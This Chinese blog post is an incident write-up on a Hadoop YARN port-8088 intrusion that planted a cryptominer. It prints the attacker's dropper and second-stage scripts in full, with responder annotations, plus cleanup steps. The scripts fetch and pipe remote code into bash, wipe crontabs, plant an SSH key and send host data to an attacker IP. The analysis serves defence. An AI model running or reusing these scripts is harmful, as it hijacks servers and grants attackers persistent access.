ESC yarn 8088端口被攻击

ESC yarn 8088端口被攻击

作者: 粮忆雨 | 来源:发表于2018-12-04 19:54 被阅读0次

    问题描述

    集群CPU占用持续严重超标,结合预警信息及yarn ui的任务列表信息得知,集群被攻击了。由于安全组中的8088端口向所有IP开放,攻击者利用Hadoop Yarn资源管理系统REST API未授权访问漏洞对服务器进行攻击,植入的通常为挖矿程序。

    image.png
    image.png

    问题分析

    使用crontab -l可以查看被植入的定时脚本

    image.png
    索性通过浏览器将脚本下载下来看看别人怎么玩你的,脚本如下:
    #!/bin/bash
    # Recovered attacker script (the dropper installed via the cron job shown
    # above). Annotated for incident response: what each step changes on the
    # host and which artifacts it leaves behind. Not meant to be executed.
    
    ## kill all others mining process 
    # Competitor cleanup: kills processes whose command line matches "getty" or
    # "/usr/bin/.sshd" and deletes /var/tmp/j*, /tmp/j* and the java* paths.
    # The rm patterns are globs, so any legitimate /tmp or /var/tmp entry whose
    # name starts with "j" is removed as well.
    pkill -f getty 
    pkill -f /usr/bin/.sshd
    rm -rf /var/tmp/j*
    rm -rf /tmp/j*
    rm -rf /var/tmp/java
    rm -rf /tmp/java
    rm -rf /var/tmp/java2
    rm -rf /tmp/java2
    rm -rf /var/tmp/java*
    rm -rf /tmp/java*
    
    ## kill other high cpu process
    # SIGKILLs every process whose %CPU column (field 3 of `ps aux`) is above
    # 40.0, excluding lines containing the word "top". On a Hadoop node this
    # can take down legitimate JVMs, which presumably explains services dying
    # after infection even though they were not targeted by name.
    ps aux | grep -vw top | awk '{if($3>40.0) print $2}' | while read procid
    do
        kill -9 $procid
    done
    
    ## get client 
    # Downloader selection. Both tests use `[ -s ]` (file exists and is
    # non-empty); because the wget check runs last, wget wins when both tools
    # are installed. `-k` / `--no-check-certificate` disable TLS verification.
    WGET="wget -O"
    if [ -s /usr/bin/curl ];then
        WGET="curl -o -k ";
    fi
    if [ -s /usr/bin/wget ];then
        WGET="curl" >/dev/null 2>&1; WGET="wget --no-check-certificate -O ";
    fi
    
    # $LDR is the "fetch to stdout" form, used later to pipe a remote script
    # straight into a shell (addToCron) and to read the remote md5 files.
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];then
        LDR="curl";
    fi
    
    # Attacker-controlled host and drop directory. The host:port string is the
    # indicator to search crontabs and the filesystem for when hunting this
    # infection (the article's find/grep transcript does exactly that).
    # /var/tmp is made world-writable.
    SERVER=http://149.28.137.164:8220
    DIR=/var/tmp
    mkdir -p /var/tmp
    chmod 777 /var/tmp
    
    
    
    download(){
        # Fetches the miner binary ($SERVER/top) and its config
        # ($SERVER/wc.conf) into $DIR. Each is first written to a
        # timestamped name (top<epoch>, wc.conf<epoch>) and then renamed,
        # so a failed or interrupted run leaves stray /var/tmp/top<epoch> or
        # /var/tmp/wc.conf<epoch> files behind (the article's grep output
        # shows such wc.conf1543939305-style leftovers). The binary is made
        # world-readable/writable/executable.
        tmptfile=top`date +%s`
        $WGET $DIR/$tmptfile $SERVER/top
        mv $DIR/$tmptfile $DIR/top
        chmod 777 $DIR/top
        
        tmpcfile=wc.conf`date +%s`
        $WGET $DIR/$tmpcfile $SERVER/wc.conf
        mv $DIR/$tmpcfile $DIR/wc.conf
    }
    
    start(){
        # Launches the miner. Artifacts: $DIR/wl.conf (a copy of wc.conf) and
        # /tmp/test.out (output of the 120-second calibration run below).
        cp $DIR/wc.conf $DIR/wl.conf
        nohup $DIR/top -c $DIR/wl.conf > /tmp/test.out & 
        sleep 120
        stop
        # Parses the reported "max" speed out of /tmp/test.out and derives
        # $diff from it (floored at 15000). The only consumer of $diff and
        # $user is the sed on the commented-out line below, so in this
        # version they are merely echoed and have no effect on the config.
        let hr=`grep -i speed  /tmp/test.out  | head -n1  | awk -F 'max' '{print $2}' | awk '{print $1}' | awk -F '.' '{print $1}' `
        let diff=(hr * 50)
        let diff=diff/1000
        let diff=diff*1000
        if [ $diff -lt 15000 ];then
            let diff=15000
        fi
        # Note the path is "/$DIR/wl.conf", i.e. "//var/tmp/wl.conf".
        user=`grep user /$DIR/wl.conf  | grep -v "user-agent" | awk -F ':' '{print $2}' | awk -F '.' '{print $1}' | awk -F '"' '{print $2}' | head -n1`
        hostname=`hostname`
        echo "user:"$user
        echo "hostname:"$hostname
        echo "diff:$diff"
        # sed -i "s/$user/$user.$hostname+$diff/g" $DIR/wl.conf 
        # Final, detached launch with all output discarded. This is the
        # process that stop() and the main flow look for by path.
        nohup $DIR/top -c $DIR/wl.conf > /dev/null 2>&1 &
    }
    
    stop(){
        # SIGKILLs every process whose ps -ef line contains "/var/tmp/top".
        # Responders can use the same path match to confirm the miner is gone.
        ps -ef | grep "/var/tmp/top" | grep -v grep | awk '{print $2}' | while read procid
        do
          kill -9 $procid
        done
    }
    
    restart(){
        # stop() followed by start(); not called from this script's main flow.
        stop
        start
    }
    
    addToCron(){
        # Cron persistence. If the attacker's host:port is not already in the
        # user's crontab, the ENTIRE existing crontab is discarded (crontab -r)
        # and replaced with one hourly job that downloads mr.sh from $SERVER
        # and pipes it into bash. Consequences for responders: (1) legitimate
        # cron jobs of this user were destroyed and cannot be recovered from
        # the live crontab; (2) searching crontab -l for the host:port string
        # is a reliable way to find the implant; (3) because mr.sh is fetched
        # every hour, deleting the dropped files without removing this entry
        # leads to re-infection.
        if crontab -l | grep -q "149.28.137.164:8220"
        then
            echo "Cron exists"
        else
            crontab -r
            echo "Cron not found"
            (crontab -l 2>/dev/null; echo "0 * * * * $LDR http://149.28.137.164:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
        fi
    }
    
    addKey(){
        # SSH persistence, independent of cron: appends an attacker public key
        # (comment field "root@sgp") to ~/.ssh/authorized_keys of whichever
        # user runs the script. Cleanup must remove the line containing
        # "root@sgp" from authorized_keys on every affected node, otherwise
        # the attacker keeps interactive access after the miner is removed.
        mkdir -p ~/.ssh
        grep "root@sgp" ~/.ssh/authorized_keys || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChb5kWdC0BmwWKxXjBeqw+D1Cze1fb+Lq2ZtxfXqyCBVt7syW2WqCXeGNoM6qSMaAo+HhmBCCY+PTr9aSIrZ8/KUu5ImBmdRJRKYSK4YtrFkYtmZDsAeiUqXEkYwZvNS6xDZ7b+3Fnbq9rBYnslN0+9Mkl3ORpDCfQIsGzfpOSKPz5RlliEIV5Q8mCODBTvy+DkFsd7qLk1vrCNLOQgkp+0+pzPeTVquIIjTvE0RDwP5l5YJ3jl4VnRC8ZkgxG6dBRqLxiJskYauCBfvhgHxzA6rricqusxzUytq8ZLb8CE19fT2nVkbuhSS9o+4cVzso3J9Gg/tL+tKKYq9A+1gGN root@sgp" >> ~/.ssh/authorized_keys
        chmod 600 ~/.ssh/authorized_keys
    }
    
    hb(){
        # "Heartbeat": reports the host to the attacker's server. The JSON
        # body carries the hostname, the current user, whether the miner is
        # running (count of /var/tmp/top processes), and the host's public IP
        # as returned by an external lookup (curl ip.cn). The POST to
        # $SERVER/webservice/api/v1.0/hb and the request to ip.cn are useful
        # network indicators in proxy or flow logs.
        hostname=`hostname`
        user=`whoami`
        mining=`ps -ef | grep /var/tmp/top | grep -v grep | wc -l` 
        agent_running=0
        # cron=`crontab -l`
        ip=`curl ip.cn | awk '{print $2}' | awk -F ':' '{print $2}'`
        cron="xxxx"
        curl -i -H "Content-Type: application/json" -X POST $SERVER/webservice/api/v1.0/hb -d '{
            "hostname":"'"${hostname}"'",
            "user":"'"${user}"'",
            "mining":"'"${mining}"'",
            "ip":"'"${ip}"'",
            "agent_running":"'"${agent_running}"'",
            "cron":"'"${cron}"'"
        }'
    }
    
    ## avoid multi process in one machine
    
    ## judge whether need to update mine program 
    # Main flow. If /var/tmp/top already exists, the md5 of the binary and of
    # wc.conf are compared with values served by $SERVER (pmd5sum.txt and
    # cmd5sum.txt). Both equal: only (re)start the miner if no process
    # matching "/var/tmp/top" and "wl.conf" is found. Either differs: kill,
    # re-download, restart. No binary present: infect from scratch. The "x"
    # suffixes keep the string comparisons valid when a remote fetch returns
    # nothing. Persistence (cron, SSH key) and the beacon then run
    # unconditionally, so deleting the dropped files alone does not end the
    # infection.
    if [ -a "/var/tmp/top" ];then
        ## judge if remote mining program update 
        local_p_sum=$(md5sum /var/tmp/top | awk '{ print $1 }')
        remote_p_sum=`$LDR $SERVER/pmd5sum.txt`
        local_c_sum=$(md5sum /var/tmp/wc.conf | awk '{ print $1 }')
        remote_c_sum=`$LDR $SERVER/cmd5sum.txt`
        if [ "$local_p_sum"x = "$remote_p_sum"x ];then
            if [ "$local_c_sum"x = "$remote_c_sum"x ];then
                echo "Both Checksum equal , no need update . "
                # check mining program is running or not 
                if [ ! "$(ps -fe|grep '/var/tmp/top'|grep 'wl.conf'|grep -v grep)" ];then
                    echo "Starting program. "
                    start
                else
                    echo "Still running ..."
                fi
            else
                echo "Config Checksum not equal , download and restart. "
                stop
                download
                start
            fi
        else
            echo "Program Checksum not equal , download and restart. "
            stop
            download
            start 
        fi
    else
        stop
        download
        start
    fi
    
    # Persistence and check-in run on every invocation regardless of the
    # branch taken above.
    addToCron
    addKey
    hb
    

    所谓想要征服岛国,首先要了解它。
    从脚本大致可以知道它操纵了哪些东西,但这还不够(后面补充)。首先根据脚本找到被下载的垃圾(恶意)文件的位置

    诸如此类(注意脚本中设置的是 DIR=/var/tmp,因此 top、wc.conf、wl.conf 及带时间戳的 wc.conf* 实际落在 /var/tmp 下;/tmp/test.out 是挖矿程序试跑的输出):
    /tmp/test.out
    /var/top
    /var/top*
    /var/wc.conf
    /var/wc.conf*
    /var/wl.conf
    /var/wc.conf*

    补充:攻击者另外已在你的sh文件中加了一行命令(这也是为何只单纯删除掉下载的文件和杀死相关进程后,攻击程序过一段时间后还会定时启动的原因)。茫然,鬼知道他在哪个文件做了手脚。无奈只能搜索文件内容:由于攻击者是通过远程服务器下载脚本的,可以用它的ip作为关键字来搜索。

    [root@octserver1 ~]# find /usr | xargs grep -ri -s "149.28.137.164"
    /usr/tmp/wc.conf:            "url": "149.28.137.164:7777",
    /usr/tmp/wl.conf:            "url": "149.28.137.164:7777",
    /usr/tmp/wc.conf1543939305:            "url": "149.28.137.164:7777",
    /usr/tmp/wc.conf1543939321:            "url": "149.28.137.164:7777",
    /usr/hdp/2.6.5.0-292/hadoop/etc/hadoop/hadoop-env.sh:   curl http://149.28.137.164:8220/install.sh | bash -sh
    /usr/hdp/2.6.5.0-292/hadoop/conf/hadoop-env.sh: curl http://149.28.137.164:8220/install.sh | bash -sh
    /usr/hdp/2.6.5.0-292/hadoop-yarn/etc/hadoop/hadoop-env.sh:  curl http://149.28.137.164:8220/install.sh | bash -sh
    
    [root@octserver1 ~]# find /var/tmp | xargs grep -ri -s "149.28.137.164"
    /var/tmp/wc.conf:            "url": "149.28.137.164:7777",
    /var/tmp/wl.conf:            "url": "149.28.137.164:7777",
    /var/tmp/wc.conf1543939305:            "url": "149.28.137.164:7777",
    /var/tmp/wc.conf1543939321:            "url": "149.28.137.164:7777",
    /var/tmp/wc.conf:            "url": "149.28.137.164:7777",
    /var/tmp/wl.conf:            "url": "149.28.137.164:7777",
    /var/tmp/wc.conf1543939305:            "url": "149.28.137.164:7777",
    /var/tmp/wc.conf1543939321:            "url": "149.28.137.164:7777",
    

    被植入 hadoop-env.sh 的那一行 curl http://149.28.137.164:8220/install.sh | bash -sh 会下载并直接执行 install.sh,其内容如下:

    #!/bin/bash
    
    addToCron(){
        # Second-stage cron persistence (same logic as in the first script).
        # Picks curl if present, else wget. If the attacker's host:port is not
        # already in the crontab, the user's whole existing crontab is removed
        # (crontab -r) and replaced by an hourly job that fetches mr.sh from
        # the attacker's server and pipes it into bash. Any legitimate cron
        # jobs of this user are lost; the host:port string is the indicator
        # to look for in crontab -l.
        LDR="wget -q -O -"
        if [ -s /usr/bin/curl ];then
             LDR="curl";
        fi
        if crontab -l | grep -q "149.28.137.164:8220"
        then
            echo "Cron exists"
        else
            crontab -r
            echo "Cron not found"
            (crontab -l 2>/dev/null; echo "0 * * * * $LDR http://149.28.137.164:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
        fi
    }
    
    addKey(){
        # Appends an attacker SSH public key (comment "root@sgp") to the
        # running user's ~/.ssh/authorized_keys. This persistence survives
        # removal of the cron job and the dropped files; remove the line
        # containing "root@sgp" from authorized_keys on every node.
        mkdir -p ~/.ssh
        grep "root@sgp" ~/.ssh/authorized_keys || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChb5kWdC0BmwWKxXjBeqw+D1Cze1fb+Lq2ZtxfXqyCBVt7syW2WqCXeGNoM6qSMaAo+HhmBCCY+PTr9aSIrZ8/KUu5ImBmdRJRKYSK4YtrFkYtmZDsAeiUqXEkYwZvNS6xDZ7b+3Fnbq9rBYnslN0+9Mkl3ORpDCfQIsGzfpOSKPz5RlliEIV5Q8mCODBTvy+DkFsd7qLk1vrCNLOQgkp+0+pzPeTVquIIjTvE0RDwP5l5YJ3jl4VnRC8ZkgxG6dBRqLxiJskYauCBfvhgHxzA6rricqusxzUytq8ZLb8CE19fT2nVkbuhSS9o+4cVzso3J9Gg/tL+tKKYq9A+1gGN root@sgp" >> ~/.ssh/authorized_keys
        chmod 600 ~/.ssh/authorized_keys
    }
    
    # install.sh does nothing but (re)establish the two persistence
    # mechanisms; it is what the line implanted in hadoop-env.sh runs every
    # time that file is sourced.
    addToCron
    addKey
    

    解决问题

    以下操作需要在所有集群节点上逐一执行

    1、停止所有hadoop集群服务,通过jps查看并停止无关的java进程
    类似以下进程无法正常kill掉,rm -rf /tmp/hsperfdata_* 可以快速清除这些残留进程(注意:这只是删除 jps 读取的 JVM 性能数据文件,让 jps 不再显示这些条目,并不会终止仍在运行的进程;应再用 ps 确认相关进程确实已退出)

    image.png
    2、查看定时脚本,删除被植入的定时任务 image.png
    3、通过top命令查看占用CPU高的进程,并kill掉
    image.png
    4、删除/var/tmp目录下top、wc.conf、wl.conf等,只保留aliyun_assist_update.lock、systemd-private-*
    image.png
    5、删除被添加的脚本内容,最后发现hadoop-env.sh是同一个文件的链接。修改/usr/hdp/2.6.5.0-292/hadoop/etc/hadoop/hadoop-env.sh即可。在最后一行去掉被植入的内容。
    6、重启服务。另外还要注意:脚本中的 addKey 函数会向 ~/.ssh/authorized_keys 追加一个注释为 root@sgp 的公钥,清理时需在所有节点上删除该行,否则攻击者仍可通过 SSH 登录;同时应在安全组中关闭 8088 端口对所有IP的开放,否则会被再次利用。

    参考:https://blog.csdn.net/xiaolong_4_2/article/details/81839551


